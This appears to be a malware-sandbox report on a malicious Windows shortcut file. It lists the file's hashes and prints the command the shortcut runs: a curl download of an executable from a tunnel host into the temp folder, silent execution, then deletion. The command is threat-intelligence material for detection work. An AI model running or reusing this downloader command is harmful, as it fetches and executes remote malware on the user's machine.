Malicious
Malicious

859ae699bf16b2feff41358bb2059ba5

LNK File
|
MD5: 859ae699bf16b2feff41358bb2059ba5
|
Size: 1.65 KB
|
application/x-ms-shortcut


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
859ae699bf16b2feff41358bb2059ba5
Sha1
dd298305cec8f2a0e9ec8ffd830903db870d990f
Sha256
df7b3c89dda87bb06d3e6c10bff9596bfd8805692d910b31f026988af3a2bbf4
Sha384
263841f2024dc22e40f85b6b9008ae57a5b7ace82d3e60f18d74cac83fa5425c8a13e46fa937694051a9cacba56affe2
Sha512
1caa5b3a77ca02714c9a129022ec2ffea1dcb0b358f3918df71f4da5930a1c83e7e596c8f19c5a7a184ff611bef6329b2b611b324612d67b71386666f6f7747a
SSDeep
24:8VOJI5UmtJ1TAY8PA+/2YyJi5VFfa4A+U/FIP4I0aA3yUUXQaR3+9h/LnU+Y+/vm:8R+1wJi5yNxfIPzXv3WzU+Yk
TLSH
B131AF652FDA0339D2B2CA3B44F5E3424B33B951E9738F9D4280D29C2C55600E836F6B
File Structure
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /c "curl -s -L -o %TEMP%\loader.exe https://gl1g7tts-5500.euw.devtunnels.ms/free.exe && start /min cmd /c "%TEMP%\loader.exe & del %TEMP%\loader.exe""

859ae699bf16b2feff41358bb2059ba5 (1.65 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙